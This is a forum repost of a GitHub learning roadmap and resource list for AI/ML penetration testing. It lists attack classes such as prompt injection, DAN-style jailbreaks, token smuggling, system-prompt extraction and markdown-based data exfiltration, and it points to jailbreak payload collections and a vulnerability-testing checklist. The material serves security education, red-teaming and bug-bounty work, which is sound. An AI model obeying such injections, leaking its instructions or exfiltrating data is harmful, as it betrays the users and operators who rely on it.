Nytro Posted Friday at 02:26 PM Report Posted Friday at 02:26 PM 🛡️ AI/ML Pentesting Roadmap A comprehensive, structured guide to learning AI/ML security and penetration testing — from zero to practitioner. 📋 Table of Contents Prerequisites Phase 1 — Foundations Phase 2 — AI/ML Security Concepts Phase 3 — Prompt Injection & LLM Attacks Phase 4 — Hands-On Practice Phase 5 — Advanced Exploitation Techniques Phase 6 — Real-World Research & Bug Bounty Standards, Frameworks & References Tools & Repositories Books, PDFs & E-Books Video Resources CTF & Competitions Bug Bounty Programs Community & News Suggested Learning Path by Experience Level Prerequisites Before diving into AI/ML pentesting, ensure you have the following foundation: General Security Basics PortSwigger Web Security Academy — Free, hands-on web security training (XSS, SQLi, SSRF, etc.) TryHackMe — Pre-Security Path HackTheBox Academy OWASP Top 10 Programming (Python is essential) Python for Everybody — Coursera Automate the Boring Stuff with Python — Free online book CS50P — Python — Free Harvard course APIs & HTTP Understand REST APIs, HTTP methods, headers, and authentication flows Postman Learning Center Practice with tools: curl, Burp Suite, Postman Phase 1 — Foundations 1.1 Machine Learning Fundamentals Resource Type Cost Machine Learning — Andrew Ng (Coursera) Course Audit Free Introduction to ML — edX Course Audit Free fast.ai Practical Deep Learning Course Free Google Machine Learning Crash Course Course Free Kaggle ML Courses Course Free 3Blue1Brown — Neural Networks Video Free 1.2 Large Language Models (LLMs) Understanding how LLMs work is critical before attacking them. Resource Type Cost Andrej Karpathy — Intro to LLMs Video Free Andrej Karpathy — Let's build GPT Video Free Hugging Face NLP Course Course Free LLM University by Cohere Course Free Prompt Engineering Guide Guide Free Phase 2 — AI/ML Security Concepts 2.1 Core Security Concepts OWASP LLM Top 10 — The definitive OWASP list for LLM vulnerabilities MITRE ATLAS Matrix — Adversarial Tactics, Techniques, and Common Knowledge for AI systems NIST AI Risk Management Framework — Federal AI risk guidance IBM — AI Security Overview AI Village — LLM Threat Modeling Promptingguide — Adversarial Attacks HackerOne — Ultimate Guide to Managing Ethical and Security Risks in AI 2.2 Attack Surface Overview Key attack vectors in AI/ML systems: Prompt Injection — Manipulating LLM behavior through crafted inputs Jailbreaking — Bypassing safety filters and guardrails Model Inversion — Extracting training data from a model Membership Inference — Determining if data was in training set Data Poisoning — Corrupting training data to influence behavior Adversarial Examples — Perturbed inputs that fool classifiers Model Extraction/Stealing — Cloning a model via API queries Supply Chain Attacks — Malicious models/weights on platforms like Hugging Face Insecure Plugin/Tool Integration — Exploiting LLM agents with external tools Training Data Exfiltration — Extracting memorized private data Denial of Service — Overloading models via crafted prompts 2.3 MLOps & Infrastructure Security From MLOps to MLOops — JFrog Offensive ML Playbook AI Exploits — ProtectAI Awesome AI Security — ottosulin Phase 3 — Prompt Injection & LLM Attacks 3.1 Understanding Prompt Injection IBM Guide on Prompt Injection Simon Willison's Explanation of Prompt Injection Learn Prompting — Prompt Hacking and Injection PortSwigger LLM Attacks NCC Group — Exploring Prompt Injection Attacks Bugcrowd — AI Vulnerability Deep Dive: Prompt Injection 3.2 Jailbreaking Techniques DAN (Do Anything Now) — Classic jailbreak technique: Chatgpt-DAN Repo Role-playing / Persona manipulation Token smuggling — Encoding instructions to bypass filters Prompt leaking — Extracting system prompts Indirect prompt injection — Attacks via documents, web content, memory WideOpenAI — Jailbreak Collection PayloadsAllTheThings — Prompt Injection PALLMs — Payloads for Attacking LLMs 3.3 Indirect Prompt Injection A more sophisticated attack where malicious instructions are injected via external data sources (emails, documents, websites) that an LLM agent processes. Greshake — LLM Security / Not What You've Signed Up For Embrace The Red — Blog — Comprehensive blog covering real-world indirect injection GitHub Copilot Chat: Prompt Injection to Data Exfiltration Google AI Studio Data Exfiltration 3.4 Advanced Prompt Attack Techniques How to Persuade an LLM to Change Its System Prompt Bugcrowd Ultimate Guide to AI Security (PDF) Snyk OWASP Top 10 LLM (PDF) Vanna.AI Prompt Injection RCE — JFrog Phase 4 — Hands-On Practice 4.1 Interactive Platforms & Games Platform Description Link Gandalf LLM prompt testing game — extract the password gandalf.lakera.ai Prompt Airlines Gamified prompt injection learning promptairlines.com Crucible Interactive AI security challenges by Dreadnode crucible.dreadnode.io Immersive Labs AI Structured AI security exercises prompting.ai.immersivelabs.com Secdim AI Games Prompt injection games play.secdim.com/game/ai HackAPrompt Community prompt injection competition hackaprompt.com PortSwigger LLM Labs Hands-on web LLM attack labs Web Security Academy 4.2 Vulnerable-by-Design Projects Repository Description Damn Vulnerable LLM Agent — WithSecureLabs Intentionally vulnerable LLM agent ScottLogic Prompt Injection Playground Local prompt injection lab Greshake LLM Security Tools Proof-of-concept attacks 4.3 CTF Writeups to Study CTF Writeup — HackPack CTF 2024 LLM Edition LLM Pentest Writeups — System Weakness Phase 5 — Advanced Exploitation Techniques 5.1 Agent & Tool Integration Attacks When LLMs are integrated with tools (code execution, web browsing, file systems), the attack surface expands dramatically. LLM Pentest: Leveraging Agent Integration for RCE — BlazeInfoSec LLM Pentest: Leveraging Agent Integration For RCE (full) Dumping a Database with an AI Chatbot — Synack CSWSH Meets LLM Chatbots 5.2 Data Exfiltration via LLMs Google AI Studio: LLM-Powered Data Exfiltration Google AI Studio Mass Data Exfil (Regression) Hacking Google Bard — From Prompt Injection to Data Exfiltration AWS Amazon Q Markdown Rendering Vulnerability GitHub Copilot Chat Data Exfiltration 5.3 Account Takeover & Authentication Attacks ChatGPT Account Takeover — Wildcard Web Cache Deception Shockwave — Critical ChatGPT Vulnerability (Web Cache Deception) Security Flaws in ChatGPT Ecosystem — Salt Security OpenAI Allowed Unlimited Credit on New Accounts — Checkmarx 5.4 XSS & Web Vulnerabilities in AI Products XSS Marks the Spot: Digging Up Vulnerabilities in ChatGPT — Imperva Zeroday on GitHub Copilot 5.5 Model & Infrastructure Attacks Shelltorch Explained: Multiple Vulnerabilities in TorchServe (CVSS 9.9) From ChatBot to SpyBot: ChatGPT Post-Exploitation — Imperva 5.6 Persistent Attacks & Memory Exploitation ChatGPT Persistent Denial of Service via Memory Attacks — Embrace the Red 5.7 Adversarial Machine Learning CleverHans Library — Adversarial example library ART (Adversarial Robustness Toolbox) — IBM Foolbox — Python toolbox for adversarial attacks Phase 6 — Real-World Research & Bug Bounty 6.1 Notable Research & Disclosures We Hacked Google AI for $50,000 — LandH New Google Gemini Content Manipulation Vulnerabilities — HiddenLayer Jailbreak of Meta AI (Llama 3.1) Revealing Config Details Bypass Instructions to Manipulate Google Bard My LLM Bug Bounty Journey on Hugging Face Hub Anonymised Penetration Test Report — Volkis Lakera Real World LLM Exploits (PDF) 6.2 How to Find LLM Vulnerabilities Key areas to test when assessing an LLM-powered application: System prompt extraction — Can you leak the hidden system prompt? Instruction override — Can you ignore system-level instructions? Plugin/tool abuse — Can agent tools be misused (SSRF, RCE, SQLi)? Data exfiltration via markdown — Does the UI render  ? Persistent injection via memory — Can you inject instructions that persist in memory/RAG? PII leakage — Does the model reveal training data or other users' data? Cross-user data leakage — In multi-tenant apps, can you access other users' contexts? Authentication bypass — Can you trick the LLM into performing privileged actions? Standards, Frameworks & References Resource Description OWASP LLM Top 10 Top 10 LLM vulnerability classes MITRE ATLAS AI adversarial threat matrix NIST AI RMF US Federal AI risk management framework OWASP AI Exchange Cross-industry AI security guidance ISO/IEC 42001 International AI management standard ENISA AI Threat Landscape EU AI threat landscape report Google Secure AI Framework (SAIF) Google's AI security framework Tools & Repositories Offensive Tools Tool Purpose Garak LLM vulnerability scanner PyRIT Microsoft's Python Risk Identification Toolkit for LLMs LLM Fuzzer Fuzzing framework for LLMs PALLMs Payloads for attacking LLMs PromptInject Prompt injection attack framework PurpleLlama / CyberSecEval Meta's LLM security evaluation Defensive / Scanning Tools Tool Purpose Rebuff Prompt injection detection NeMo Guardrails NVIDIA guardrail framework Lakera Guard Commercial prompt injection protection AI Exploits — ProtectAI Real-world ML exploit collection ModelScan Scan ML model files for malicious code Reference Lists Resource Description Awesome LLM Security — corca-ai Curated LLM security list Awesome LLM — Hannibal046 Everything LLM including security Awesome AI Security — ottosulin General AI security resources LLM Hacker's Handbook Comprehensive hacking handbook PayloadsAllTheThings — Prompt Injection Payload collection WideOpenAI Jailbreak and bypass collection Chatgpt-DAN DAN jailbreak collection Books, PDFs & E-Books Resource Link LLM Hacker's Handbook GitHub OWASP Top 10 for LLM (Snyk) PDF Bugcrowd Ultimate Guide to AI Security PDF Lakera Real World LLM Exploits PDF HackerOne Ultimate Guide to Managing AI Risks E-Book Adversarial Machine Learning — Goodfellow et al. arXiv Video Resources Resource Link Penetration Testing Against and With AI/LLM/ML (Playlist) YouTube Andrej Karpathy — Intro to Large Language Models YouTube DEF CON AI Village Talks YouTube LiveOverflow — AI/ML Security YouTube 3Blue1Brown — Neural Networks Series YouTube John Hammond — AI Security Challenges YouTube Cybrary — Machine Learning Security Cybrary CTF & Competitions Competition Description Link Crucible Ongoing AI security challenges crucible.dreadnode.io HackAPrompt Annual prompt injection competition hackaprompt.com AI Village CTF (DEF CON) Annual AI security CTF at DEF CON aivillage.org Gandalf Self-paced LLM challenge gandalf.lakera.ai Prompt Airlines Gamified injection challenges promptairlines.com Hack The Box AI Challenges HTB AI-themed challenges hackthebox.com Secdim AI Games Web-based AI security games play.secdim.com/game/ai Bug Bounty Programs AI/ML security bug bounties are growing rapidly. Target these platforms: Program Scope Link OpenAI Bug Bounty ChatGPT, API, plugins bugcrowd.com/openai Google AI Bug Bounty Gemini, Bard, Vertex AI bughunters.google.com Meta AI Bug Bounty Llama models, Meta AI facebook.com/whitehat HuggingFace via ProtectAI Hub, models, spaces huntr.com Anthropic Bug Bounty Claude, API anthropic.com/security Microsoft (Copilot, Azure AI) Copilot, Azure OpenAI msrc.microsoft.com Huntr (AI/ML focused) Open source ML libraries huntr.com Tips for AI bug bounty: Focus on data exfiltration via markdown rendering (common finding) Test plugin/tool integrations thoroughly Look for prompt injection in RAG pipelines Explore memory and persistent context manipulation Check for cross-tenant data leakage in multi-user deployments Community & News Communities AI Village — DEF CON's AI security community OWASP AI Exchange — Open standard for AI security ProtectAI — AI security research and tools Embrace the Red — Blog — Leading blog on LLM security Kai Greshake's Research — Indirect prompt injection research Newsletters & Blogs The Batch — DeepLearning.AI — Weekly AI news Simon Willison's Weblog — Authoritative LLM security commentary HiddenLayer Research — AI security research Lakera Blog — LLM security insights PortSwigger Research — Web + AI security research Suggested Learning Path by Experience Level 🟢 Beginner (0–3 months) Complete PortSwigger Web Security Academy fundamentals Learn Python basics Take Google ML Crash Course Read OWASP LLM Top 10 Play Gandalf — all levels Read Simon Willison's prompt injection article Watch Andrej Karpathy — Intro to LLMs 🟡 Intermediate (3–9 months) Study MITRE ATLAS Matrix Complete PortSwigger LLM Attack labs Set up and exploit Damn Vulnerable LLM Agent Complete Prompt Airlines and Crucible challenges Read the LLM Hacker's Handbook Study the Embrace the Red blog in full Experiment with Garak and PyRIT Try Offensive ML Playbook 🔴 Advanced (9+ months) Participate in AI Village CTF at DEF CON Submit findings to Huntr or OpenAI Bug Bounty Study adversarial ML with ART and CleverHans Read academic papers on model inversion, membership inference, and data extraction Contribute to open source tools like Garak or AI Exploits Build your own vulnerable LLM demo environment Write and publish research — blog posts, CVEs, conference talks Key Academic Papers Paper Year Explaining and Harnessing Adversarial Examples — Goodfellow et al. 2014 Extracting Training Data from Large Language Models — Carlini et al. 2021 Not What You've Signed Up For: Compromising Real-World LLM-Integrated Applications with Indirect Prompt Injection — Greshake et al. 2023 Membership Inference Attacks against Machine Learning Models — Shokri et al. 2017 Universal and Transferable Adversarial Attacks on Aligned Language Models — Zou et al. 2023 Jailbroken: How Does LLM Safety Training Fail? — Wei et al. 2023 Prompt Injection attack against LLM-integrated Applications 2023 Last updated: 2025 | Contributions welcome — submit a PR with new resources.  Sursa: https://github.com/anmolksachan/AI-ML-Free-Resources-for-Security-and-Prompt-Injection Quote